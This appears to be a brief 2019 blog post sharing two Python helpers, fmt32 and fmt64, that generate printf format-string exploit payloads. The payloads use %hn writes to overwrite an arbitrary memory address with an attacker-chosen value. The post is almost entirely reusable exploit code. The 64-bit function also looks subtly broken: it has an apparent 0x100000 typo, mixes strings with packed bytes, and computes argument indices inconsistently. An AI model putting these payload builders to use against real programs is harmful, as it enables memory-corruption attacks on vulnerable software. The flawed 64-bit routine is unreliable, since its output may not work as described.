Fmt
May 11, 2019
2 minutes read
# 32bit
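def fmt32(target, overwrite, offset=7):
    """Build a 32-bit printf format-string payload that stores ``overwrite``
    at ``target`` with two 2-byte ``%hn`` writes.

    Buffer layout::

        p32(target) | "BBBB" | p32(target+2) | "%08x"*(offset-2) | %<w1>c%hn%<w2>c%hn

    The buffer is assumed to be the format string itself and to start at stack
    argument ``offset`` (i.e. ``%08x`` consumes arguments 1..offset-2, the
    first ``%c`` consumes argument offset-1, and the first ``%hn`` stores
    through argument ``offset`` = ``target``).  ``BBBB`` is a filler dword
    consumed by the second ``%c`` so the argument pointer steps from
    ``target`` to ``target+2``.

    ``w1`` advances the character count to the low halfword of ``overwrite``
    and ``w2`` then advances it to the high halfword.  Both widths are taken
    modulo 0x10000 (``%hn`` only stores the low 16 bits of the count) and a
    zero delta becomes a full 0x10000 wrap, because ``%c`` always prints at
    least one character and a literal ``%0c`` would be off by one.

    Caveat: the addresses sit at the *front* of the format string, so a NUL
    byte in ``target`` or ``target+2`` (e.g. 0x0804a000) terminates the
    string before any specifier is reached.  Pick a target without NUL bytes
    or use a layout that puts the addresses last (as ``fmt64`` does).

    Args:
        target: Address to overwrite; ``target`` and ``target+2`` must fit
            in 32 bits.
        overwrite: 32-bit value to write.
        offset: Stack-argument index of the first payload dword (>= 2).

    Returns:
        bytes: The payload (``str`` on Python 2, where ``bytes is str``).

    Raises:
        ValueError: On out-of-range ``target``/``overwrite`` or ``offset < 2``.
    """
    import struct

    if not (0 <= target and target + 2 <= 0xffffffff):
        raise ValueError("target and target+2 must fit in 32 bits")
    if not 0 <= overwrite <= 0xffffffff:
        raise ValueError("overwrite must fit in 32 bits")
    if offset < 2:
        raise ValueError("offset must be >= 2 (one %c precedes the first %hn)")

    lo = overwrite & 0xffff
    hi = (overwrite >> 16) & 0xffff

    # Equivalent to pwntools p32(): little-endian 32-bit pack.
    addrs = struct.pack("<I", target) + b"BBBB" + struct.pack("<I", target + 2)
    # Each %08x prints exactly 8 chars for a 32-bit value, so the running
    # character count stays predictable while the argument pointer advances.
    skip = b"%08x" * (offset - 2)
    printed = len(addrs) + 8 * (offset - 2)

    def width(delta):
        # %Nc must print at least one char, and %hn stores only the low 16
        # bits of the count, so a zero (or negative) delta wraps to 0x10000.
        return (delta % 0x10000) or 0x10000

    w1 = width(lo - printed)  # count -> low halfword, stored at target
    w2 = width(hi - lo)       # count -> high halfword, stored at target+2
    writes = "%{}c%hn%{}c%hn".format(w1, w2).encode("ascii")
    return addrs + skip + writes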
# 64bit

def fmt64(target, overwrite, offset=6):
    first  = overwrite & 0xffff
    second = (overwrite&0xffff0000)>>16
    third  = (overwrite&0xffff00000000)>>32

    pay = "%" + str(first) + "c"
    pay += "%{0}$hn"
    
    if second > first:
        pay += "%" + str(second - first) + "c"
        pay += "%{1}$hn"
    else:
        pay += "%" + str(0x10000 + second - first) + "c"
        pay += "%{1}$hn"

    if third > second:
        pay += "%" + str(third - second) + "c"
        pay += "%{2}$hn"
    else:
        pay += "%" + str(0x100000 + third - second) + "c"
        pay += "%{2}$hn" 

    pay += "%" + str(0x10000 - third) + "c"
    pay += "%{3}$hn"
        
    pay += "A"*(8 - len(pay) % 8)
    pay = pay.format( offset + len(pay)/8 - 1, offset + len(pay)/8 , offset + len(pay)/8 + 1, offset + len(pay)/8 + 2  )
    pay = pay[:len(pay) - len(pay)%8]

    pay += p64(target) + p64(target+2) + p64(target+4)+ p64(target+6)
    return pay
